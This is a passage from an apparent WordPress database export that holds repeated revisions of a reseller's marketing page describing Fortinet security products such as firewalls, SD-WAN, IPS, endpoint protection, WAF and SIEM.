speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:51:33','2019-09-30 03:51:33','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3562,1,'2019-09-30 14:19:52','2019-09-30 06:19:52','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of 